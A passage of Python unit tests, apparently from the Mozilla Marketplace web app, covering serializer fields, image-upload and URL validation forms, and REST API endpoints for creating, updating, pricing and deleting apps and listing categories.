        eq_(into, {'categories': [c1, c2]})
    def test_parse_as_pk(self):
        app = Webapp.objects.get(pk=337141)
        into = {}
        field = SlugOrPrimaryKeyRelatedField(queryset=Webapp.objects.all())
        field.field_from_native({'addon': 337141}, None, 'addon', into)
        eq_(into, {'addon': app})
    def test_render_as_slugs(self):
        app = Webapp.objects.get(pk=337141)
        c1 = Category.objects.create(name='delicious', slug='foo',
                                     type=amo.ADDON_WEBAPP)
        c2 = Category.objects.create(name='scrumptious', slug='baz',
                                     type=amo.ADDON_WEBAPP)
        AddonCategory.objects.create(addon=app, category=c1)
        AddonCategory.objects.create(addon=app, category=c2)
        field = SlugOrPrimaryKeyRelatedField(queryset=Category.objects.all(),
                                             render_as='slug',
                                             slug_field='slug',
                                             many=True)
        eq_(field.field_to_native(app, 'categories'), [c1.slug, c2.slug])
    def test_render_as_slug(self):
        v = Version.objects.get(pk=1268829)
        field = SlugOrPrimaryKeyRelatedField(queryset=Webapp.objects.all(),
                                             render_as='slug',
                                             slug_field='app_slug')
        eq_(field.field_to_native(v, 'addon'), v.addon.app_slug)
    def test_parse_as_slugs(self):
        # Input parsing accepts slugs even without render_as='slug'.
        c1 = Category.objects.create(name='delicious', slug='foo',
                                     type=amo.ADDON_WEBAPP)
        c2 = Category.objects.create(name='scrumptious', slug='baz',
                                     type=amo.ADDON_WEBAPP)
        into = {}
        field = SlugOrPrimaryKeyRelatedField(queryset=Category.objects.all(),
                                             many=True)
        field.field_from_native({'categories': [c1.slug, c2.slug]}, None,
                                'categories', into)
        eq_(into, {'categories': [c1, c2]})
    def test_parse_as_slug(self):
        app = Webapp.objects.get(pk=337141)
        into = {}
        field = SlugOrPrimaryKeyRelatedField(queryset=Webapp.objects.all(),
                                             slug_field='app_slug')
        field.field_from_native({'addon': app.app_slug}, None, 'addon', into)
        eq_(into, {'addon': app})
class Spud(object):
    """Minimal stand-in object serialized by SpudSerializer in the
    SplitField tests below."""
    pass
class Potato(object):
    """Wrapper holding a single `spud`; serialized by PotatoSerializer."""
    def __init__(self, spud):
        self.spud = spud
class SpudSerializer(Serializer):
    """Empty serializer used as the output half of the SplitField below."""
    pass
class PotatoSerializer(Serializer):
    # `spud` uses a SplitField: CharField for input, SpudSerializer for
    # output.
    spud = SplitField(CharField(), SpudSerializer())
class TestSplitField(TestCase):
    """SplitField should propagate the serializer context (notably the
    request) into its output serializer."""
    def setUp(self):
        self.request = RequestFactory().get('/')
        self.spud = Spud()
        self.potato = Potato(self.spud)
        self.serializer = PotatoSerializer(self.potato,
                                           context={'request': self.request})
    def test_initialize(self):
        """
        Test that the request context is passed from PotatoSerializer's context
        to the context of `PotatoSerializer.spud.output`.
        """
        field = self.serializer.fields['spud']
        # BUG FIX: the original passed a third value to eq_(), which nose
        # treats as the assertion *message*, so the parent serializer's
        # context was never actually compared. Assert both equalities
        # explicitly instead.
        eq_(self.request, field.output.context['request'])
        eq_(self.request, self.serializer.context['request'])
        ok_(not hasattr(field.input, 'context'))
########NEW FILE########
__FILENAME__ = test_forms
import base64
from django.core.exceptions import ValidationError
import mock
from nose.tools import eq_, ok_
import amo
import amo.tests
from mkt.api.forms import (PreviewJSONForm, SchemeURLValidator,
SluggableModelChoiceField)
class TestPreviewForm(amo.tests.TestCase, amo.tests.AMOPaths):
    """Validation tests for PreviewJSONForm (base64-encoded screenshots)."""
    def setUp(self):
        # Use a context manager so the fixture file handle is closed
        # promptly instead of leaking until garbage collection.
        with open(self.mozball_image(), 'r') as fobj:
            self.file = base64.b64encode(fobj.read())
    def test_bad_type(self):
        form = PreviewJSONForm({'file': {'data': self.file, 'type': 'wtf?'},
                                'position': 1})
        assert not form.is_valid()
        eq_(form.errors['file'], ['Images must be either PNG or JPG.'])
    def test_bad_file(self):
        # A zip file is not a valid image regardless of the claimed type.
        with open(self.packaged_app_path('mozball.zip'), 'r') as fobj:
            file_ = base64.b64encode(fobj.read())
        form = PreviewJSONForm({'file': {'data': file_, 'type': 'image/png'},
                                'position': 1})
        assert not form.is_valid()
        eq_(form.errors['file'], ['Images must be either PNG or JPG.'])
    def test_position_missing(self):
        form = PreviewJSONForm({'file': {'data': self.file,
                                         'type': 'image/jpg'}})
        assert not form.is_valid()
        eq_(form.errors['position'], ['This field is required.'])
    def test_preview(self):
        # Empty data/type is rejected the same way as a bad type.
        form = PreviewJSONForm({'file': {'type': '', 'data': ''},
                                'position': 1})
        assert not form.is_valid()
        eq_(form.errors['file'], ['Images must be either PNG or JPG.'])
    def test_not_json(self):
        form = PreviewJSONForm({'file': 1, 'position': 1})
        assert not form.is_valid()
        eq_(form.errors['file'], ['File must be a dictionary.'])
    def test_not_file(self):
        form = PreviewJSONForm({'position': 1})
        assert not form.is_valid()
        eq_(form.errors['file'], ['This field is required.'])
class TestSluggableChoiceField(amo.tests.TestCase):
    """SluggableModelChoiceField.to_python() should switch the lookup field
    between the configured slug field and the pk."""
    def setUp(self):
        self.fld = SluggableModelChoiceField(mock.Mock(),
                                             sluggable_to_field_name='foo')
    def test_nope(self):
        # The sluggable_to_field_name kwarg is mandatory.
        with self.assertRaises(ValueError):
            SluggableModelChoiceField()
    def test_slug(self):
        # Non-numeric values are looked up by the configured slug field.
        self.fld.to_python(value='asd')
        # BUG FIX: the original used ok_(x, 'foo'), where 'foo' is merely
        # the assertion *message*, so only truthiness was checked. Compare
        # against the configured field name for real.
        eq_(self.fld.to_field_name, 'foo')
    def test_pk(self):
        # Numeric values are treated as primary keys.
        self.fld.to_python(value='1')
        ok_(self.fld.to_field_name is None)
    def test_else(self):
        self.fld.to_python(value=None)
        ok_(self.fld.to_field_name is None)
class TestSchemeURLValidator(amo.tests.TestCase):
    """Behaviour of SchemeURLValidator with and without a scheme whitelist."""
    ftp_url = 'ftp://my-domain.com'
    not_a_url = 'not-a-url'
    def test_url_validator_invalid_url(self):
        validate = SchemeURLValidator()
        with self.assertRaises(ValidationError):
            validate(self.not_a_url)
    def test_url_validator_no_schemes(self):
        # No scheme restriction: any syntactically valid URL passes,
        # ftp included. No exception expected.
        SchemeURLValidator()(self.ftp_url)
    def test_url_validator_valid_scheme(self):
        # Whitelisting the URL's own scheme keeps it valid.
        SchemeURLValidator(schemes=['ftp', 'http'])(self.ftp_url)
    def test_url_validator_invalid_scheme(self):
        validate = SchemeURLValidator(schemes=['ftps', 'https'])
        with self.assertRaises(ValidationError):
            validate(self.ftp_url)
########NEW FILE########
__FILENAME__ = test_handlers
import json
import os
import urllib
import tempfile
from decimal import Decimal
from StringIO import StringIO
from django.core.urlresolvers import reverse
from mock import patch
from nose.tools import eq_
from rest_framework.request import Request
from test_utils import RequestFactory
import amo
from access.models import Group, GroupUser
from addons.models import (Addon, AddonDeviceType, AddonUpsell,
AddonUser, Category, Preview)
from amo.tests import AMOPaths, app_factory, TestCase
from files.models import FileUpload
from reviews.models import Review
from tags.models import AddonTag, Tag
from users.models import UserProfile
import mkt
from mkt.api.models import Access, generate
from mkt.api.fields import LargeTextField
from mkt.api.tests.test_oauth import RestOAuthClient, RestOAuth
from mkt.constants import regions
from mkt.site.fixtures import fixture
from mkt.webapps.models import AddonExcludedRegion, Webapp
from mkt.prices.models import Price, PriceCurrency
class CreateHandler(RestOAuth):
    """Shared setup for app-creation API tests: a validated manifest upload
    plus a couple of webapp/extension categories."""
    fixtures = fixture('user_2519', 'platform_all')
    def setUp(self):
        super(CreateHandler, self).setUp()
        self.list_url = reverse('app-list')
        self.user = UserProfile.objects.get(pk=2519)
        # Only the generated *name* is kept; the temp file object itself is
        # discarded (and presumably deleted on close) — manifest_copy_over
        # repopulates the path. NOTE(review): relies on NamedTemporaryFile
        # delete-on-close semantics; confirm on non-POSIX platforms.
        self.file = tempfile.NamedTemporaryFile('w', suffix='.webapp').name
        self.manifest_copy_over(self.file, 'mozball-nice-slug.webapp')
        self.categories = []
        for x in range(0, 2):
            self.categories.append(Category.objects.create(
                name='cat-%s' % x,
                slug='cat-%s' % x,
                type=amo.ADDON_WEBAPP))
            self.categories.append(Category.objects.create(
                name='cat-%s' % x,
                slug='cat-%s' % x,
                type=amo.ADDON_EXTENSION))
    def create(self, fil=None):
        # Create a valid FileUpload for the given path (default: the
        # manifest copied over in setUp).
        if fil is None:
            fil = self.file
        return FileUpload.objects.create(user=self.user, path=fil,
                                         name=fil, valid=True)
def _mock_fetch_content(url):
    """Stand-in for fetch_content(): ignore `url` and return an open file
    object for a local test icon instead of hitting the network."""
    icon_path = os.path.join(os.path.dirname(__file__), '..', '..',
                             'developers', 'tests', 'icons', '337141-128.png')
    return open(icon_path)
class TestAppCreateHandler(CreateHandler, AMOPaths):
    """End-to-end tests for the app REST endpoints: creation from a manifest
    upload, retrieval, updates via PUT, deletion and permission checks."""
    fixtures = fixture('app_firefox', 'platform_all', 'user_admin',
                       'user_2519', 'user_999')
    def count(self):
        return Addon.objects.count()
    def test_verbs(self):
        self.create()
        self._allowed_verbs(self.list_url, ['get', 'post'])
        self.create_app()
        self._allowed_verbs(self.get_url, ['get', 'put', 'delete'])
    def test_not_accepted_tos(self):
        self.user.update(read_dev_agreement=None)
        obj = self.create()
        res = self.client.post(self.list_url,
                               data=json.dumps({'manifest': obj.uuid}))
        eq_(res.status_code, 403)
        eq_(res.json, {'detail': 'Terms of Service not accepted.'})
    def test_not_valid(self):
        obj = self.create()
        obj.update(valid=False)
        res = self.client.post(self.list_url,
                               data=json.dumps({'manifest': obj.uuid}))
        eq_(res.status_code, 400)
        eq_(res.json['detail'], 'Upload not valid.')
        eq_(self.count(), 0)
    def test_not_there(self):
        res = self.client.post(self.list_url,
                               data=json.dumps({'manifest':
                                   'some-random-32-character-stringy'}))
        eq_(res.status_code, 400)
        eq_(res.json['detail'], 'No upload found.')
        eq_(self.count(), 0)
    def test_anon(self):
        obj = self.create()
        obj.update(user=None)
        res = self.client.post(self.list_url,
                               data=json.dumps({'manifest': obj.uuid}))
        eq_(res.status_code, 403)
        eq_(self.count(), 0)
    def test_not_yours(self):
        obj = self.create()
        obj.update(user=UserProfile.objects.get(email='[email protected]'))
        res = self.client.post(self.list_url,
                               data=json.dumps({'manifest': obj.uuid}))
        eq_(res.status_code, 403)
        eq_(self.count(), 0)
    @patch('mkt.webapps.views.record_action')
    def test_create(self, record_action):
        obj = self.create()
        res = self.client.post(self.list_url,
                               data=json.dumps({'manifest': obj.uuid}))
        eq_(res.status_code, 201)
        content = json.loads(res.content)
        eq_(content['status'], 0)
        eq_(content['slug'], u'mozillaball')
        eq_(content['support_email'], None)
        eq_(self.count(), 1)
        app = Webapp.objects.get(app_slug=content['slug'])
        eq_(set(app.authors.all()), set([self.user]))
        assert record_action.called
    def create_app(self, fil=None):
        # Helper: create an app via the API and remember its detail URL.
        obj = self.create(fil)
        res = self.client.post(self.list_url,
                               data=json.dumps({'manifest': obj.uuid}))
        pk = json.loads(res.content)['id']
        self.get_url = reverse('app-detail', kwargs={'pk': pk})
        return Webapp.objects.get(pk=pk)
    def test_upsell(self):
        app = self.create_app()
        upsell = app_factory()
        self.make_premium(upsell)
        AddonUpsell.objects.create(free=app, premium=upsell)
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        obj = json.loads(res.content)['upsell']
        eq_(obj['id'], upsell.id)
        eq_(obj['app_slug'], upsell.app_slug)
        eq_(obj['name'], upsell.name)
        eq_(obj['icon_url'], upsell.get_icon_url(128))
        eq_(obj['resource_uri'],
            reverse('app-detail', kwargs={'pk': upsell.id}))
    def test_get(self):
        self.create_app()
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        content = json.loads(res.content)
        eq_(content['status'], 0)
    def test_get_slug(self):
        app = self.create_app()
        url = reverse('app-detail', kwargs={'pk': app.app_slug})
        res = self.client.get(url)
        content = json.loads(res.content)
        eq_(content['id'], app.pk)
    def test_list(self):
        app = self.create_app()
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200)
        content = json.loads(res.content)
        eq_(content['meta']['total_count'], 1)
        eq_(content['objects'][0]['id'], app.pk)
    def test_list_anon(self):
        eq_(self.anon.get(self.list_url).status_code, 403)
    def test_get_device(self):
        app = self.create_app()
        AddonDeviceType.objects.create(addon=app,
                                       device_type=amo.DEVICE_DESKTOP.id)
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        content = json.loads(res.content)
        eq_(content['device_types'], [u'desktop'])
    def test_not_public(self):
        self.create_app()
        res = self.anon.get(self.get_url)
        eq_(res.status_code, 403)
    def test_get_public(self):
        app = self.create_app()
        app.update(status=amo.STATUS_PUBLIC)
        res = self.anon.get(self.get_url)
        eq_(res.status_code, 200)
    def test_get_previews(self):
        app = self.create_app()
        res = self.client.get(self.get_url)
        eq_(len(json.loads(res.content)['previews']), 0)
        Preview.objects.create(addon=app)
        res = self.client.get(self.get_url)
        eq_(len(json.loads(res.content)['previews']), 1)
    def test_get_not_mine(self):
        obj = self.create_app()
        obj.authors.clear()
        res = self.client.get(self.get_url)
        eq_(res.status_code, 403)
    def test_get_privacy_policy(self):
        app = self.create_app()
        data = self.base_data()
        self.client.put(self.get_url, data=json.dumps(data))
        app.reload()
        app.authors.clear()
        res = self.client.get(reverse('app-privacy-policy-detail',
                                      args=[app.pk]))
        eq_(res.status_code, 403)
    def test_get_privacy_policy_anon(self):
        app = self.create_app()
        data = self.base_data()
        self.client.put(self.get_url, data=json.dumps(data))
        res = self.anon.get(reverse('app-privacy-policy-detail',
                                    args=[app.pk]))
        eq_(res.status_code, 403)
    def test_get_privacy_policy_mine(self):
        app = self.create_app()
        data = self.base_data()
        self.client.put(self.get_url, data=json.dumps(data))
        res = self.client.get(reverse('app-privacy-policy-detail',
                                      args=[app.pk]))
        eq_(res.json['privacy_policy'], data['privacy_policy'])
    def test_get_privacy_policy_slug(self):
        app = self.create_app()
        data = self.base_data()
        self.client.put(self.get_url, data=json.dumps(data))
        url = reverse('app-privacy-policy-detail', kwargs={'pk': app.app_slug})
        res = self.client.get(url)
        eq_(res.json['privacy_policy'], data['privacy_policy'])
    def base_data(self):
        # A complete, valid payload for PUTs against the detail endpoint.
        return {
            'support_email': '[email protected]',
            'privacy_policy': 'wat',
            'homepage': 'http://www.whatever.com',
            'name': 'mozball',
            'categories': [c.slug for c in
                           Category.objects.filter(type=amo.ADDON_WEBAPP)],
            'description': 'wat...',
            'premium_type': 'free',
            'regions': ['us'],
            'device_types': amo.DEVICE_LOOKUP.keys()
        }
    def test_put(self):
        app = self.create_app()
        res = self.client.put(self.get_url, data=json.dumps(self.base_data()))
        eq_(res.status_code, 202)
        app = Webapp.objects.get(pk=app.pk)
        eq_(app.privacy_policy, 'wat')
    def test_put_as_post(self):
        # This is really a test of the HTTP_X_HTTP_METHOD_OVERRIDE header
        # and that signing works correctly. Do a POST, but ask DRF to do
        # a PUT.
        app = self.create_app()
        res = self.client.post(self.get_url, data=json.dumps(self.base_data()),
                               HTTP_X_HTTP_METHOD_OVERRIDE='PUT')
        eq_(res.status_code, 202)
        app = Webapp.objects.get(pk=app.pk)
        eq_(app.privacy_policy, 'wat')
    def test_put_anon(self):
        app = self.create_app()
        app.update(status=amo.STATUS_PUBLIC)
        res = self.anon.put(self.get_url, data=json.dumps(self.base_data()))
        eq_(res.status_code, 403)
    def test_put_categories_worked(self):
        app = self.create_app()
        res = self.client.put(self.get_url, data=json.dumps(self.base_data()))
        eq_(res.status_code, 202)
        app = Webapp.objects.get(pk=app.pk)
        eq_(set([c.pk for c in app.categories.all()]),
            set([c.pk for c in Category.objects.filter(type=amo.ADDON_WEBAPP)]))
    def test_post_content_ratings(self):
        """Test the @action on AppViewSet to attach the content ratings."""
        app = self.create_app()
        url = reverse('app-content-ratings', kwargs={'pk': app.pk})
        res = self.client.post(url, data=json.dumps(
            {'submission_id': 50, 'security_code': 'AB12CD3'}))
        eq_(res.status_code, 201)
        eq_(res.content, '')
    def test_post_content_ratings_bad(self):
        """Test the @action on AppViewSet to attach the content ratings."""
        app = self.create_app()
        url = reverse('app-content-ratings', kwargs={'pk': app.pk})
        # Missing `security_code`.
        res = self.client.post(url, data=json.dumps({'submission_id': 50}))
        eq_(res.status_code, 400)
        eq_(json.loads(res.content),
            {'security_code': ['This field is required.']})
    def test_dehydrate(self):
        app = self.create_app()
        res = self.client.put(self.get_url, data=json.dumps(self.base_data()))
        eq_(res.status_code, 202)
        res = self.client.get(self.get_url + '?lang=en')
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        self.assertSetEqual(data['categories'],
                            [c.slug for c in app.categories.all()])
        eq_(data['current_version'], app.current_version.version)
        self.assertSetEqual(data['device_types'],
                            [n.api_name for n in amo.DEVICE_TYPES.values()])
        eq_(data['homepage'], u'http://www.whatever.com')
        eq_(data['is_packaged'], False)
        eq_(data['author'], 'Mozilla Labs')
        eq_(data['manifest_url'], app.manifest_url)
        eq_(data['premium_type'], 'free')
        eq_(data['price'], None)
        eq_(data['price_locale'], None)
        eq_(data['public_stats'], False)
        eq_(data['support_email'], u'[email protected]')
        eq_(data['ratings'], {'count': 0, 'average': 0.0})
        eq_(data['user'], {'developed': True, 'installed': False,
                           'purchased': False})
    def test_ratings(self):
        app = self.create_app()
        rater = UserProfile.objects.get(pk=999)
        Review.objects.create(addon=app, user=self.user, body='yes', rating=3)
        Review.objects.create(addon=app, user=rater, body='no', rating=2)
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['ratings'], {'count': 2, 'average': 2.5})
    def test_put_wrong_category(self):
        self.create_app()
        wrong = Category.objects.create(name='wrong', slug='wrong',
                                        type=amo.ADDON_EXTENSION,
                                        application_id=amo.FIREFOX.id)
        data = self.base_data()
        data['categories'] = [wrong.slug]
        res = self.client.put(self.get_url, data=json.dumps(data))
        eq_(res.status_code, 400)
    def test_put_no_categories(self):
        self.create_app()
        data = self.base_data()
        del data['categories']
        res = self.client.put(self.get_url, data=json.dumps(data))
        eq_(res.status_code, 400)
        eq_(res.json['categories'], ['This field is required.'])
    def test_put_no_desktop(self):
        self.create_app()
        data = self.base_data()
        del data['device_types']
        res = self.client.put(self.get_url, data=json.dumps(data))
        eq_(res.status_code, 400)
        eq_(res.json['device_types'], ['This field is required.'])
    def test_put_devices_worked(self):
        app = self.create_app()
        data = self.base_data()
        data['device_types'] = [a.api_name for a in amo.DEVICE_TYPES.values()]
        res = self.client.put(self.get_url, data=json.dumps(data))
        eq_(res.status_code, 202)
        app = Webapp.objects.get(pk=app.pk)
        eq_(set(d for d in app.device_types),
            set(amo.DEVICE_TYPES[d] for d in amo.DEVICE_TYPES.keys()))
    def test_put_desktop_error_nice(self):
        self.create_app()
        data = self.base_data()
        data['device_types'] = [12345]
        res = self.client.put(self.get_url, data=json.dumps(data))
        eq_(res.status_code, 400)
        assert '12345' in res.json['device_types'][0], res.data
    def create_price(self, price):
        tier = Price.objects.create(price=price)
        # This is needed for the serialisation of the app.
        PriceCurrency.objects.create(tier=tier, price=price, provider=1,
                                     region=regions.US.id)
    def test_put_price(self):
        app = self.create_app()
        data = self.base_data()
        self.create_price('1.07')
        data['premium_type'] = 'premium'
        data['price'] = '1.07'
        res = self.client.put(self.get_url, data=json.dumps(data))
        eq_(res.status_code, 202)
        app = Webapp.objects.get(pk=app.pk)
        eq_(str(app.get_price(region=regions.US.id)), '1.07')
    def test_put_premium_inapp(self):
        app = self.create_app()
        data = self.base_data()
        self.create_price('1.07')
        data['premium_type'] = 'premium-inapp'
        data['price'] = '1.07'
        res = self.client.put(self.get_url, data=json.dumps(data))
        eq_(res.status_code, 202)
        app = Webapp.objects.get(pk=app.pk)
        eq_(str(app.get_price(region=regions.US.id)), '1.07')
        eq_(app.premium_type, amo.ADDON_PREMIUM_INAPP)
    def test_put_bad_price(self):
        self.create_app()
        data = self.base_data()
        self.create_price('1.07')
        self.create_price('3.14')
        data['premium_type'] = 'premium'
        data['price'] = "2.03"
        res = self.client.put(self.get_url, data=json.dumps(data))
        eq_(res.status_code, 400)
        eq_(res.json['price'][0],
            'Premium app specified without a valid price. Price can be one of '
            '"1.07", "3.14".')
    def test_put_no_price(self):
        self.create_app()
        data = self.base_data()
        Price.objects.create(price='1.07')
        Price.objects.create(price='3.14')
        data['premium_type'] = 'premium'
        res = self.client.put(self.get_url, data=json.dumps(data))
        eq_(res.status_code, 400)
        eq_(res.json['price'][0],
            'Premium app specified without a valid price. Price can be one of '
            '"1.07", "3.14".')
    def test_put_free_inapp(self):
        app = self.create_app()
        data = self.base_data()
        data['premium_type'] = 'free-inapp'
        res = self.client.put(self.get_url, data=json.dumps(data))
        eq_(res.status_code, 202)
        eq_(app.reload().get_price(region=regions.US.id), None)
    # TODO: renable when regions are sorted out.
    # def test_put_region_bad(self):
    #     self.create_app()
    #     data = self.base_data()
    #     data['regions'] = []
    #     res = self.client.put(self.get_url, data=json.dumps(data))
    #     eq_(res.status_code, 400)
    #
    # def test_put_region_good(self):
    #     app = self.create_app()
    #     data = self.base_data()
    #     data['regions'] = ['br', 'us', 'uk']
    #     res = self.client.put(self.get_url, data=json.dumps(data))
    #     eq_(res.status_code, 202)
    #     eq_(app.get_regions(), [regions.BR, regions.UK, regions.US])
    def test_put_not_mine(self):
        obj = self.create_app()
        obj.authors.clear()
        res = self.client.put(self.get_url, data='{}')
        eq_(res.status_code, 403)
    def test_put_not_there(self):
        url = reverse('app-detail', kwargs={'pk': 123})
        res = self.client.put(url, data='{}')
        eq_(res.status_code, 404)
    def test_delete(self):
        obj = self.create_app()
        res = self.client.delete(self.get_url)
        eq_(res.status_code, 204)
        assert not Webapp.objects.filter(pk=obj.pk).exists()
    def test_delete_not_mine(self):
        obj = self.create_app()
        obj.authors.clear()
        res = self.client.delete(self.get_url)
        eq_(res.status_code, 403)
        assert Webapp.objects.filter(pk=obj.pk).exists()
    def test_reviewer_get(self):
        app = self.create_app()
        data = self.base_data()
        self.client.put(self.get_url, data=json.dumps(data))
        editor = UserProfile.objects.get(email='[email protected]')
        g = Group.objects.create(rules='Apps:Review,Reviews:Edit')
        GroupUser.objects.create(group=g, user=editor)
        ac = Access.objects.create(key='adminOauthKey', secret=generate(),
                                   user=editor)
        client = RestOAuthClient(ac)
        r = client.get(self.get_url)
        eq_(r.status_code, 200)
        res = client.get(reverse('app-privacy-policy-detail',
                                 args=[app.pk]))
        # BUG FIX: this previously re-asserted `r.status_code`, leaving the
        # privacy-policy response status unchecked.
        eq_(res.status_code, 200)
        eq_(res.json['privacy_policy'], data['privacy_policy'])
    def test_admin_get(self):
        app = self.create_app()
        data = self.base_data()
        self.client.put(self.get_url, data=json.dumps(data))
        admin = UserProfile.objects.get(email='[email protected]')
        g = Group.objects.create(rules='*:*')
        GroupUser.objects.create(group=g, user=admin)
        ac = Access.objects.create(key='adminOauthKey', secret=generate(),
                                   user=admin)
        client = RestOAuthClient(ac)
        r = client.get(self.get_url)
        eq_(r.status_code, 200)
        res = client.get(reverse('app-privacy-policy-detail',
                                 args=[app.pk]))
        # BUG FIX: same as test_reviewer_get — check the second response.
        eq_(res.status_code, 200)
        eq_(res.json['privacy_policy'], data['privacy_policy'])
class CreatePackagedHandler(amo.tests.AMOPaths, RestOAuth):
    """Shared setup for packaged-app creation tests: a valid zip upload and
    two webapp categories."""
    fixtures = fixture('user_2519', 'platform_all')
    def setUp(self):
        super(CreatePackagedHandler, self).setUp()
        self.list_url = reverse('app-list')
        self.user = UserProfile.objects.get(pk=2519)
        # Only the generated temp-file *name* is used; packaged_copy_over
        # fills the path with the fixture zip.
        self.file = tempfile.NamedTemporaryFile('w', suffix='.zip').name
        self.packaged_copy_over(self.file, 'mozball.zip')
        self.categories = []
        for x in range(0, 2):
            self.categories.append(Category.objects.create(
                name='cat-%s' % x,
                type=amo.ADDON_WEBAPP))
    def create(self):
        # A valid FileUpload pointing at the copied-over zip.
        return FileUpload.objects.create(user=self.user, path=self.file,
                                         name=self.file, valid=True)
@patch('versions.models.Version.is_privileged', False)
class TestPackagedAppCreateHandler(CreatePackagedHandler):
    """POSTing a valid zip upload creates a packaged app."""
    fixtures = fixture('user_2519', 'platform_all')
    def test_create(self):
        obj = self.create()
        res = self.client.post(self.list_url,
                               data=json.dumps({'upload': obj.uuid}))
        eq_(res.status_code, 201)
        content = json.loads(res.content)
        eq_(content['status'], 0)
        # Note the packaged status is not returned in the result.
        app = Webapp.objects.get(app_slug=content['slug'])
        eq_(app.is_packaged, True)
class TestListHandler(CreateHandler, AMOPaths):
    """The app list endpoint only returns apps authored by the requesting
    user."""
    fixtures = fixture('user_2519', 'user_999', 'platform_all')
    def create(self, users):
        # NOTE(review): overrides CreateHandler.create() with a different
        # signature (list of users instead of a file path) — only safe
        # because these tests never call the inherited form.
        app = Addon.objects.create(type=amo.ADDON_WEBAPP)
        for user in users:
            AddonUser.objects.create(user=user, addon=app)
        return app
    def create_apps(self, *all_owners):
        # One app per owners-list; each entry is a list of UserProfile pks.
        apps = []
        for owners in all_owners:
            owners = [UserProfile.objects.get(pk=pk) for pk in owners]
            apps.append(self.create(owners))
        return apps
    def test_create(self):
        apps = self.create_apps([2519], [999])
        res = self.client.get(self.list_url)
        data = json.loads(res.content)
        eq_(data['meta']['total_count'], 1)
        eq_(data['objects'][0]['id'], apps[0].pk)
    def test_multiple(self):
        apps = self.create_apps([2519], [999, 2519])
        res = self.client.get(self.list_url)
        data = json.loads(res.content)
        eq_(data['meta']['total_count'], 2)
        pks = set([data['objects'][0]['id'], data['objects'][1]['id']])
        eq_(pks, set([app.pk for app in apps]))
    def test_lang(self):
        # The ?lang= parameter selects which translation is serialized.
        app = app_factory(description={'fr': 'Le blah', 'en-US': 'Blah'})
        url = reverse('app-detail', args=[app.pk])
        res = self.client.get(url + '?lang=en')
        eq_(json.loads(res.content)['description'], 'Blah')
        res = self.client.get(url + '?lang=fr')
        eq_(json.loads(res.content)['description'], 'Le blah')
class TestAppDetail(RestOAuth):
    """Read-only behaviour of the app detail endpoint against the canonical
    fixture app (pk 337141)."""
    fixtures = fixture('user_2519', 'webapp_337141')
    def setUp(self, api_name='apps'):
        super(TestAppDetail, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.get_url = reverse('app-detail', kwargs={'pk': self.app.app_slug})
        self.create_switch('iarc')
    def test_price(self):
        res = self.client.get(self.get_url)
        data = json.loads(res.content)
        eq_(data['price'], None)
    def test_price_other_region(self):
        res = self.client.get(self.get_url, {'lang': 'fr'})
        data = json.loads(res.content)
        eq_(data['price'], None)
    def test_nonexistent_app(self):
        """
        In combination with test_nonregion, this ensures that a distinction is
        appropriately drawn between attempts to access nonexistent apps and
        attempts to access apps that are unavailable due to legal restrictions.
        """
        url = reverse('app-detail', kwargs={'pk': 1})
        res = self.client.get(url)
        eq_(res.status_code, 404)
    def test_nonregion(self):
        # Region-excluded apps answer 451 (unavailable for legal reasons)
        # with support contact details in the payload.
        self.app.addonexcludedregion.create(region=regions.BR.id)
        self.app.support_url = u'http://www.example.com/fake_support_url'
        self.app.save()
        res = self.client.get(self.get_url, data={'region': 'br'})
        eq_(res.status_code, 451)
        data = json.loads(res.content)['detail']
        eq_(data['reason'], 'Not available in your region.')
        eq_(data['support_email'], '')
        eq_(data['support_url'], 'http://www.example.com/fake_support_url')
    def test_owner_nonregion(self):
        # Owners can still see their app in excluded regions.
        AddonUser.objects.create(addon_id=337141, user_id=self.user.pk)
        AddonExcludedRegion.objects.create(addon_id=337141,
                                           region=regions.BR.id)
        res = self.client.get(self.get_url, data={'region': 'br'})
        eq_(res.status_code, 200)
    def test_packaged_manifest_url(self):
        self.app.update(is_packaged=True)
        res = self.client.get(self.get_url, pk=self.app.app_slug)
        data = json.loads(res.content)
        eq_(self.app.get_manifest_url(), data['manifest_url'])
    def test_get_upsold(self):
        free = Webapp.objects.create(status=amo.STATUS_PUBLIC)
        AddonUpsell.objects.create(premium_id=337141, free=free)
        res = self.client.get(self.get_url)
        eq_(res.json['upsold'],
            reverse('app-detail', kwargs={'pk': free.pk}))
    def test_tags(self):
        tag1 = Tag.objects.create(tag_text='example1')
        tag2 = Tag.objects.create(tag_text='example2')
        AddonTag.objects.create(tag=tag1, addon=self.app)
        AddonTag.objects.create(tag=tag2, addon=self.app)
        res = self.client.get(self.get_url, pk=self.app.app_slug)
        data = json.loads(res.content)
        eq_(data['tags'], ['example1', 'example2'])
    def test_banner_message(self):
        geodata = self.app.geodata
        geodata.banner_regions = [mkt.regions.BR.id, mkt.regions.AR.id]
        geodata.banner_message = u'Hello!'
        geodata.save()
        res = self.client.get(self.get_url + '?lang=en')
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['banner_message'], unicode(geodata.banner_message))
        eq_(data['banner_regions'], [mkt.regions.AR.slug, mkt.regions.BR.slug])
class TestCategoryHandler(RestOAuth):
    """Read-only category endpoints: webapp categories only, localized
    names, slug or pk lookup."""
    def setUp(self):
        super(TestCategoryHandler, self).setUp()
        self.cat = Category.objects.create(name='Webapp',
                                           type=amo.ADDON_WEBAPP,
                                           slug='thewebapp')
        self.cat.name = {'fr': 'Le Webapp'}
        self.cat.save()
        # Non-webapp category: should never appear through this API.
        self.other = Category.objects.create(name='other',
                                             type=amo.ADDON_EXTENSION)
        self.list_url = reverse('app-category-list')
        self.get_url = reverse('app-category-detail',
                               kwargs={'pk': self.cat.pk})
    def test_verbs(self):
        self._allowed_verbs(self.list_url, ['get'])
        self._allowed_verbs(self.get_url, ['get'])
    def test_has_cors(self):
        self.assertCORS(self.client.get(self.list_url), 'get')
    def test_weight(self):
        # Negative weight hides a category from the listing.
        self.cat.update(weight=-1)
        res = self.anon.get(self.list_url)
        data = json.loads(res.content)
        eq_(data['meta']['total_count'], 0)
    def test_get_slug(self):
        url = reverse('app-category-detail', kwargs={'pk': self.cat.slug})
        res = self.client.get(url)
        data = json.loads(res.content)
